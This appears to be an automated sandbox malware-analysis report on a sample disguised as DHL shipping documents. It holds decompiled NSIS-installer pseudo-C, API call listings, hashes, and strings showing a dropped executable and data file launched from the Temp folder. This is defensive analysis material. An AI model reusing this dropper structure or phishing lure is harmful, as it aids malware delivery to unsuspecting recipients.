                        0x004058aa
                        0x004058b3
                        0x004058d5
                        0x004058db
                        0x004058ec
                        0x004058f1
                        0x004058ff
                        0x0040590d
                        0x0040590d
                        0x00405912
                        0x00405920
                        0x00405920
                        0x00405925
                        0x00405928
                        0x0040592d
                        0x00405939
                        0x00405942
                        0x0040594f
                        0x0040595e
                        0x00405951
                        0x00405956
                        0x00405956
                        0x0040596a
                        0x0040596a
                        0x0040597e
                        0x00405987
                        0x00405990
                        0x004059a0
                        0x004059ac
                        0x004059ac
                        0x00000000

                        APIs
                        • GetDlgItem.USER32 ref: 00405867
                        • GetDlgItem.USER32 ref: 00405876
                        • GetClientRect.USER32 ref: 004058B3
                        • GetSystemMetrics.USER32 ref: 004058BA
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                        • ShowWindow.USER32(?,00000008), ref: 00405956
                        • GetDlgItem.USER32 ref: 00405977
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                        • GetDlgItem.USER32 ref: 00405885
                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                        • GetDlgItem.USER32 ref: 004059C9
                        • CreateThread.KERNEL32 ref: 004059D7
                        • CloseHandle.KERNEL32(00000000), ref: 004059DE
                        • ShowWindow.USER32(00000000), ref: 00405A02
                        • ShowWindow.USER32(?,00000008), ref: 00405A07
                        • ShowWindow.USER32(00000008), ref: 00405A51
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                        • CreatePopupMenu.USER32 ref: 00405A96
                        • AppendMenuW.USER32 ref: 00405AAA
                        • GetWindowRect.USER32 ref: 00405ACA
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                        • OpenClipboard.USER32(00000000), ref: 00405B2B
                        • EmptyClipboard.USER32 ref: 00405B31
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                        • GlobalLock.KERNEL32 ref: 00405B47
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                        • SetClipboardData.USER32 ref: 00405B86
                        • CloseClipboard.USER32 ref: 00405B8C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: H7B${
                        • API String ID: 590372296-2256286769
                        • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                        • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                        • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                        • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                        0x00404ab5
                        0x00404abb
                        0x00404ac1
                        0x00404ace
                        0x00404adc
                        0x00404adf
                        0x00404ae7
                        0x00404aed
                        0x00404aed
                        0x00404af9
                        0x00404afc
                        0x00404b6a
                        0x00404b71
                        0x00404c48
                        0x00404c4f
                        0x00404c5e
                        0x00404c5e
                        0x00404c62
                        0x00404c6c
                        0x00404c79
                        0x00404c7b
                        0x00404c7b
                        0x00404c89
                        0x00404c90
                        0x00404c97
                        0x00404c9a
                        0x00404cd6
                        0x00404cd8
                        0x00404cde
                        0x00404ce3
                        0x00404ce7
                        0x00404ce9
                        0x00404ce9
                        0x00404d05
                        0x00000000
                        0x00404d07
                        0x00404d0a
                        0x00404d18
                        0x00404d1e
                        0x00404d1f
                        0x00404d22
                        0x00404d25
                        0x00000000
                        0x00404d25
                        0x00404c9c
                        0x00404c9e
                        0x00404ca2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404ca4
                        0x00404ca4
                        0x00404cb1
                        0x00404cb6
                        0x00000000
                        0x00000000
                        0x00404cba
                        0x00404cbc
                        0x00404cbc
                        0x00404cc5
                        0x00404cc7
                        0x00404ccc
                        0x00404ccf
                        0x00404cd4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404cd4
                        0x00404d31
                        0x00404d3b
                        0x00404d3e
                        0x00404d41
                        0x00404d48
                        0x00404d48
                        0x00404d4a
                        0x00404d4a
                        0x00404d4f
                        0x00404d51
                        0x00404d59
                        0x00404d60
                        0x00404d62
                        0x00404d6d
                        0x00404d6d
                        0x00404d62
                        0x00404d7d
                        0x00404d87
                        0x00404d8f
                        0x00404daa
                        0x00404d91
                        0x00404d9a
                        0x00404d9a
                        0x00404d8f
                        0x00404daf
                        0x00404db4
                        0x00404db9
                        0x00404dc2
                        0x00404dc2
                        0x00404dcb
                        0x00404dcd
                        0x00404dcd
                        0x00404dd9
                        0x00404de1
                        0x00404deb
                        0x00404deb
                        0x00404df0
                        0x00000000
                        0x00404df0
                        0x00404c9a
                        0x00404c51
                        0x00404c58
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404c58
                        0x00404b77
                        0x00404b80
                        0x00404b9a
                        0x00404b9f
                        0x00404ba9
                        0x00404bb0
                        0x00404bbc
                        0x00404bbf
                        0x00404bc2
                        0x00404bc9
                        0x00404bd1
                        0x00404bd4
                        0x00404bd8
                        0x00404bdf
                        0x00404be7
                        0x00404c41
                        0x00404be9
                        0x00404bea
                        0x00404bf1
                        0x00404bfb
                        0x00404c03
                        0x00404c10
                        0x00404c24
                        0x00404c28
                        0x00404c28
                        0x00404c24
                        0x00404c2d
                        0x00404c3a
                        0x00404c3a
                        0x00404be7
                        0x00000000
                        0x00404b9f
                        0x00404b8d
                        0x00000000
                        0x00000000
                        0x00404b93
                        0x00000000
                        0x00404afe
                        0x00404b0b
                        0x00404b14
                        0x00404b21
                        0x00404b21
                        0x00404b28
                        0x00404b2e
                        0x00404b37
                        0x00404b3a
                        0x00404b3d
                        0x00404b45
                        0x00404b48
                        0x00404b4b
                        0x00404b51
                        0x00404b58
                        0x00404b5f
                        0x00404df6
                        0x00404e08
                        0x00404b65
                        0x00404b68
                        0x00000000
                        0x00404b68
                        0x00404b5f

                        APIs
                        • GetDlgItem.USER32 ref: 00404B04
                        • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                        • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                        • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00423748,00000000,?,?), ref: 00404C1C
                        • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m), ref: 00404C28
                        • SetDlgItemTextW.USER32 ref: 00404C3A
                          • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                          • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                          • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                          • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                          • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                          • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                          • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                          • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$A$C:\Users\user\AppData\Local\Temp$H7B
                        • API String ID: 2624150263-3761163765
                        • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                        • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                        • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                        • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                        0x004021b3
                        0x004021bd
                        0x004021c7
                        0x004021d1
                        0x004021dc
                        0x004021df
                        0x004021f9
                        0x004021fc
                        0x00402202
                        0x00402205
                        0x0040220f
                        0x00402213
                        0x00402213
                        0x00402218
                        0x00402229
                        0x00402231
                        0x004022e8
                        0x004022e8
                        0x004022ef
                        0x00402237
                        0x00402237
                        0x00402246
                        0x0040224a
                        0x0040224d
                        0x00402253
                        0x00402261
                        0x00402264
                        0x00402266
                        0x00402271
                        0x00402271
                        0x00402276
                        0x00402278
                        0x0040227f
                        0x0040227f
                        0x00402282
                        0x0040228b
                        0x0040228e
                        0x00402294
                        0x00402296
                        0x004022a0
                        0x004022a0
                        0x004022a3
                        0x004022ac
                        0x004022af
                        0x004022b8
                        0x004022be
                        0x004022c0
                        0x004022ce
                        0x004022ce
                        0x004022d1
                        0x004022d7
                        0x004022d7
                        0x004022da
                        0x004022e0
                        0x004022e6
                        0x004022fb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004022e6
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CreateInstance
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 542301482-501415292
                        • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                        • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                        • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                        • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                        0x00402923
                        0x0040293e
                        0x00402949
                        0x0040294a
                        0x00402a94
                        0x00402925
                        0x00402928
                        0x0040292b
                        0x0040292e
                        0x0040292e
                        0x00402c2d
                        0x00402c39

                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                        • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                        • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                        • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
